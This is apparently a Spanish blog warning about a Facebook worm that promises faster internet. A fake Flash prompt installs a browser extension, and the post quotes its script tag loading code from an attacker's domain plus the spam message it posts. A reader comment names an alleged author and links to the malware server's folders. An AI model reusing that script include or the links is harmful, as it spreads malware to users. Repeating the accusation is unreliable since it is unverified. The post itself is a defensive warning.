Gusano: Acelera tu conexion de Internet hasta un 98% en Facebook

Nos enteramos que hay una página de Facebook que anda haciendo de las suyas, engañando a los usuarios con el pretexto de «Acelerar la conexión de internet. Efectivamente lo hemos comprobado, y el engaño se aloja en esta dirección web: https://www.facebook.com/AceleratuConexion/app_208195102528120

 Tal como podrán apreciar en la imagen que adjuntamos, cuando el usuario llega hasta la página, sale ese aviso diciendo que debemos tener instalado Adobe Flash, y nos pide hacer clic en Instalar (boton en verde).
Si el usuario inocentemente hace clic sobre ese botón, se descargará una extensión (Chrome o Firefox) para su navegador web. 
Esta extensión contiene código malicioso: 
<script  src=»http://www.terrorificity.com/Apps/viralinternet/viralpage.js» type=»text/javascript»>
Y ese código, lleva exactamente el mísmo código que Facebook ya debería haber super arreglado, ya que lo vienen usando todos los gusanos que estamos reportando en este ultimo tiempo. El js, llama a un txt, que a la vez tiene el «mensaje de expansión» que veremos publicado en nuestro muro como «gancho» para que nuestros amigos caigan en el engaño:
Increible acelere la velocidad de internet, ya nada tarda en cargar =D 
http://www.facebook.com/pages/442Acelera-tu-conexi%uFFFDn-de-internet-hasta-un-98/408000965901467?sk=app_208195102528120
Ese texto por supuesto va seguido de un enlace, que es el enlace a la página que expande nuevamente el virus.

De acuerdo a nuestro análisis, todo el virus y el motor de expansión de este gusano (incluído la imagen que engaña a los usuarios sobre el falso aviso de la necesidad de tener instalado Adobe Flash) se encuentra en un servidor bajo el dominio Terrorificity.com; pueden ver más detalles aquí en Whois.net/terrorificity.com.
Como bien lo indica ese enlace, el servidor aloja sus archivos (y el virus) en HostGator.com, si quieren reportarlo y denunciarlo, simplemente deben enviar emails aquí: http://www.hostgator.com/contact.shtml
Igual que los demas gusanos, usa código de intervalos de tiempo, para que Facebook no detecte tan rápido el atacante y bloquee sus «deseos» de SPAM.

Lo unico de lo que estamos seguros es que Facebook bloqueará «por seguridad» aquellos perfiles que hagan SPAM. Y este gusano hace SPAM… por lo tanto si han caído en este engaño, deben buscar las extensiones que se llamen «AcelerarInternet» de su navegador y eliminar las mismas.

Esto es todo por el momento.
Saludos cordiales,
MasFB

Imagen cortesía de PCSegura.net.

3 comentarios en “Gusano: Acelera tu conexion de Internet hasta un 98% en Facebook

  1. ATENCIÓN!!!! Mirando los archivos del servidor descubrí quien es el autor. En Facebook se llama:
    "Mauro Sicard Salcedo" Busquenlo y denuncienló si no se lo creen aqui un enlance:
    http://www.terrorificity.com/Apps/pruebas.png
    Es un png de esa pagina haciendo spam de esa web!!
    Pero no solo eso! tambien hay una carpeta llamada "amor" que parece ser otro virus
    Solo vean:
    http://www.terrorificity.com/Apps/amor/
    Aqui la raiz:
    http://www.terrorificity.com/Apps/
    Importante:
    NO ABRAN NINGUN ARCHIVO CON ENLACE RARO, SOLO ABRAN PNG, JPG, TXT O INFORMENSE DE QUE ARCHIVO ES YA QUE SE PUEDEN INFECTAR MIRANDO 😉

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *